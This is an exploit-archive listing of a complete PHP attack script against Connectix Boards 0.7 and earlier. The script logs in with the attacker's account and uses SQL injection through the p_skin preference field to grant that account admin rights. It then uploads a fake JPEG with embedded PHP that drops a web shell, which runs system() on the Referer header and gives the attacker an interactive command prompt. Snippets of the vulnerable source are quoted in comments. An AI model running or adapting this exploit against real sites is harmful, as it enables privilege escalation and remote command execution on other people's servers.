Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit

2007-03-08 / 2007-03-09
Credit: DarkFig
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

#!/usr/bin/php <?php /** * This file require the PhpSploit class. * If you want to use this class, the latest * version can be downloaded from acid-root.new.fr. **/ require("phpsploitclass.php"); error_reporting(E_ALL ^ E_NOTICE); if($argc < 9) { print(" Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit ------------------------------------------------------------------- PHP conditions: none Credits: DarkFig <gmdarkfig (at) gmail (dot) com [email concealed]> URL: http://www.acid-root.new.fr/ ------------------------------------------------------------------- Usage: $argv[0] -url <> -usr <> -pwd <> -type <> [Options] Params: -url For example http://victim.com/connectix/ -usr The username of your account -pwd The password of your account -type Privilege Escalation(1) or Code execution(2) Options: -proxy If you wanna use a proxy <proxyhost:proxyport> -proxyauth Basic authentification <proxyuser:proxypwd> ------------------------------------------------------------------- "); exit(1); } $url = getparam('url',1); $user = getparam('usr',1); $pass = getparam('pwd',1); $type = getparam('type',1); $proxy = getparam('proxy'); $authp = getparam('proxyauth'); $theme = 'Zephyr'; $xpl = new phpsploit(); $xpl->agent("Mozilla Firefox"); $xpl->allowredirection(1); $xpl->cookiejar(1); if($proxy) $xpl->proxy($proxy); if($authp) $xpl->proxyauth($authp); print "nTrying to get logged in"; $xpl->post($url.'index.php?act=login',"username=$user&password=$pass&rem ember=on&confirm=Connexion+%21"); if(preg_match("#password#",$xpl->showcookie())) print "nLogged in"; else exit("nExploit failed"); sploit(", usr_class=1"); if($type==1) exit("nDone, $user is now admin."); # Fake JPG (with php code) generated with edjpgcom.exe # # <?php $handle=fopen('mdrpipicacalolxdwtf.gif.php','w+'); # fwrite($handle,'<?php @system($_SERVER[HTTP_REFERER]); ?/>'); # fclose($handle); unlink($_SERVER[PHP_SELF]); ?/> # $f = "xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x01x01x00x60x00x6 0x00x00xFF" ."xDBx00x43x00x08x06x06x07x06x05x08x07x07x07x09x09x08x 0Ax0Cx14" ."x0Dx0Cx0Bx0Bx0Cx19x12x13x0Fx14x1Dx1Ax1Fx1Ex1Dx1Ax1Cx 1Cx20x24" ."x2Ex27x20x22x2Cx23x1Cx1Cx28x37x29x2Cx30x31x34x34x34x 1Fx27x39" ."x3Dx38x32x3Cx2Ex33x34x32xFFxDBx00x43x01x09x09x09x0Cx 0Bx0Cx18" ."x0Dx0Dx18x32x21x1Cx21x32x32x32x32x32x32x32x32x32x32x 32x32x32" ."x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x 32x32x32" ."x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x FFxFEx00" ."xA5x3Cx3Fx70x68x70x20x24x68x61x6Ex64x6Cx65x3Dx66x6Fx 70x65x6E" ."x28x27x6Dx64x72x70x69x70x69x63x61x63x61x6Cx6Fx6Cx78x 64x77x74" ."x66x2Ex67x69x66x2Ex70x68x70x27x2Cx27x77x2Bx27x29x3Bx 66x77x72" ."x69x74x65x28x24x68x61x6Ex64x6Cx65x2Cx27x3Cx3Fx70x68x 70x20x40" ."x73x79x73x74x65x6Dx28x24x5Fx53x45x52x56x45x52x5Bx48x 54x54x50" ."x5Fx52x45x46x45x52x45x52x5Dx29x3Bx20x3Fx3Ex27x29x3Bx 66x63x6C" ."x6Fx73x65x28x24x68x61x6Ex64x6Cx65x29x3Bx20x75x6Ex6Cx 69x6Ex6B" ."x28x24x5Fx53x45x52x56x45x52x5Bx50x48x50x5Fx53x45x4Cx 46x5Dx29" ."x3Bx20x3Fx3ExFFxC0x00x11x08x00x01x00x01x03x01x22x00x 02x11x01" ."x03x11x01xFFxC4x00x1Fx00x00x01x05x01x01x01x01x01x01x 00x00x00" ."x00x00x00x00x00x01x02x03x04x05x06x07x08x09x0Ax0BxFFx C4x00xB5" ."x10x00x02x01x03x03x02x04x03x05x05x04x04x00x00x01x7Dx 01x02x03" ."x00x04x11x05x12x21x31x41x06x13x51x61x07x22x71x14x32x 81x91xA1" ."x08x23x42xB1xC1x15x52xD1xF0x24x33x62x72x82x09x0Ax16x 17x18x19" ."x1Ax25x26x27x28x29x2Ax34x35x36x37x38x39x3Ax43x44x45x 46x47x48" ."x49x4Ax53x54x55x56x57x58x59x5Ax63x64x65x66x67x68x69x 6Ax73x74" ."x75x76x77x78x79x7Ax83x84x85x86x87x88x89x8Ax92x93x94x 95x96x97" ."x98x99x9AxA2xA3xA4xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6x B7xB8xB9" ."xBAxC2xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8x D9xDAxE1" ."xE2xE3xE4xE5xE6xE7xE8xE9xEAxF1xF2xF3xF4xF5xF6xF7xF8x F9xFAxFF" ."xC4x00x1Fx01x00x03x01x01x01x01x01x01x01x01x01x00x00x 00x00x00" ."x00x01x02x03x04x05x06x07x08x09x0Ax0BxFFxC4x00xB5x11x 00x02x01" ."x02x04x04x03x04x07x05x04x04x00x01x02x77x00x01x02x03x 11x04x05" ."x21x31x06x12x41x51x07x61x71x13x22x32x81x08x14x42x91x A1xB1xC1" ."x09x23x33x52xF0x15x62x72xD1x0Ax16x24x34xE1x25xF1x17x 18x19x1A" ."x26x27x28x29x2Ax35x36x37x38x39x3Ax43x44x45x46x47x48x 49x4Ax53" ."x54x55x56x57x58x59x5Ax63x64x65x66x67x68x69x6Ax73x74x 75x76x77" ."x78x79x7Ax82x83x84x85x86x87x88x89x8Ax92x93x94x95x96x 97x98x99" ."x9AxA2xA3xA4xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8x B9xBAxC2" ."xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAx E2xE3xE4" ."xE5xE6xE7xE8xE9xEAxF2xF3xF4xF5xF6xF7xF8xF9xFAxFFxDAx 00x0Cx03" ."x01x00x02x11x03x11x00x3Fx00xF7xFAx28xA2x80x3FxFFxD9"; # +admin.bbcode.php # | # 95. if(isset($_POST['wherefile'])) { # 96. if ($_POST['wherefile']=='upload') { # 97. if (!empty($_FILES['uploadimage']['size'])){ # 98. if ($image=getimagesize(trim($_FILES['uploadimage']['tmp_name']))) { # 99. $val = array(IMAGETYPE_GIF,IMAGETYPE_JPEG,IMAGETYPE_PNG); # 100. if ($_FILES['uploadimage']['size'] <= 20480 && in_array($image[2],$val)) { # 101. $filename = $smile->smiley_librariesdir.$_POST['sm_filenameserver']; # 102. $filename = str_replace('../','',trim($filename)); # 103. //si le filenameserver contient un dossier : on cre ce dossier: # 104. mkdirs($smile->smiley_dir.dirname($filename)); # 105. if (move_uploaded_file($_FILES['uploadimage']['tmp_name'], $smile->smiley_dir.$_POST['sm_filenameserver'])) { # 106. $do=true; # 107. } # $arr = array(frmdt_url => $url.'admin.php?act=bb&#138;&#130;=4', "sm_name" => ":AbCdEfGhIj1234dsupersmilepowaa:", "sm_filenamesubdir" => "libraries/", "sm_filenameserver" => "xd.gif.php", "wherefile" => "upload", "sm_send" => "Confirmer", "uploadimage" => array(frmdt_type => "image/gif", frmdt_filename => "xd.gif.php", frmdt_content => $f)); $xpl->formdata($arr); $xpl->get($url."smileys/xd.gif.php"); print "n$shell> "; while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))) { $xpl->addheader("Referer",$cmd); $xpl->get($url."smileys/mdrpipicacalolxdwtf.gif.php"); print $xpl->getcontent()."n$shell> "; } function sploit($sql) { global $url,$xpl,$theme,$user; $pdat = "changeparams=1" ."&p_usrs=20" ."&p_topics=20" ."&p_msgs=15" ."&p_res=12" ."&p_skin=$theme" ."%00',usr_pref_skin='$theme',usr_signature=(SELECT '[XPL_IS_OK]')$sql WHERE usr_name='$user' #" ."&p_lang=fr" ."&p_timezone=1"; # +common.php # | # 95. function cleanArray(&$arr) { # 96. if (!empty($arr) && is_array($arr)) { # 97. foreach($arr as $k => $v) { # 98. if (is_array($v)) cleanArray($arr[$k]); # 99. else $arr[$k] = stripslashes($v); # 100. } # 101. } # 102. } # | # 105. if (get_magic_quotes_gpc()) { # 106. cleanArray($_POST); # 107. cleanArray($_COOKIE); # 108. cleanArray($_GET); # 109. } # # +part.userprofile.php # | # 305. /* Changement des param&#232;tres d'affichage (pas accessible par les modos ou admins) */ # 306. } elseif (isset($_POST['changeparams']) && $edit_id==$_SESSION['userid']) { # 307. if ( isset($_POST['p_usrs'],$_POST['p_topics'],$_POST['p_msgs'],$_POST['p_res '],$_POST['p_skin'],$_POST['p_lang'],$_POST['p_timezone']) ) { # 308. if (is_numeric($_POST['p_usrs']) && is_numeric($_POST['p_topics']) && is_numeric($_POST['p_msgs']) && is_numeric($_POST['p_res']) && isLang($_POST['p_lang']) && isSkin($_POST['p_skin'])) { # 309. if ((int)$_POST['p_usrs']>=5 && (int)$_POST['p_usrs']<=50 && (int)$_POST['p_topics']>=5 && (int)$_POST['p_topics']<=50 && (int)$_POST['p_msgs']>=5 && (int)$_POST['p_msgs']<=50 && (int)$_POST['p_res']>=5 && (int)$_POST['p_res']<=50 && in_array($_POST['p_timezone'],array_keys($timezones))) { # 310. $GLOBALS['cb_db']->query("UPDATE ".$GLOBALS['cb_db']->prefix."users SET usr_pref_msgs='".(int)$_POST['p_msgs']."',usr_pref_usrs='".(int)$_POST[' p_usrs']."',usr_pref_topics='".(int)$_POST['p_topics']."',usr_pref_res=' ".(int)$_POST['p_res']."',usr_pref_lang='".$_POST['p_lang']."',usr_pref_ skin='".$_POST['p_skin']."',usr_pref_timezone='".$_POST['p_timezone']."' ,usr_pref_ctsummer=".((int)(isset($_POST['p_ctsummer']) && $_POST['p_ctsummer']=='on'))." WHERE usr_id=".$_SESSION['cb_user']->userid); # 311. $_SESSION['cb_user']->reloadnext=true; # 312. redirect(manage_url('index.php?act=user&editprofile='.$_SESSION['userid' ].'&page=6','forum-profile'.$_SESSION['userid'].'-params.html')); # # +lib.cb.php # | # 117. function isLang ($langtype) { # 118. return is_dir(CB_PATH.'lang/'.$langtype); # 119. } # | # 133. function isSkin ($skintype) { # 134. return is_dir(CB_PATH.'skins/'.$skintype); # 135. } $xpl->post($url."index.php?act=user&editprofile=-1&page=6",$pdat); $xpl->get($url."index.php?act=user&editprofile=-1&page=5"); if(preg_match('#[XPL_IS_OK]#',$xpl->getcontent())) return; else exit("Exploit failed"); } function getparam($param,$opt='') { global $argv; foreach($argv as $value => $key) { if($key == '-'.$param) return $argv[$value+1]; } if($opt) exit("n-$param parameter required"); else return; } ?>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top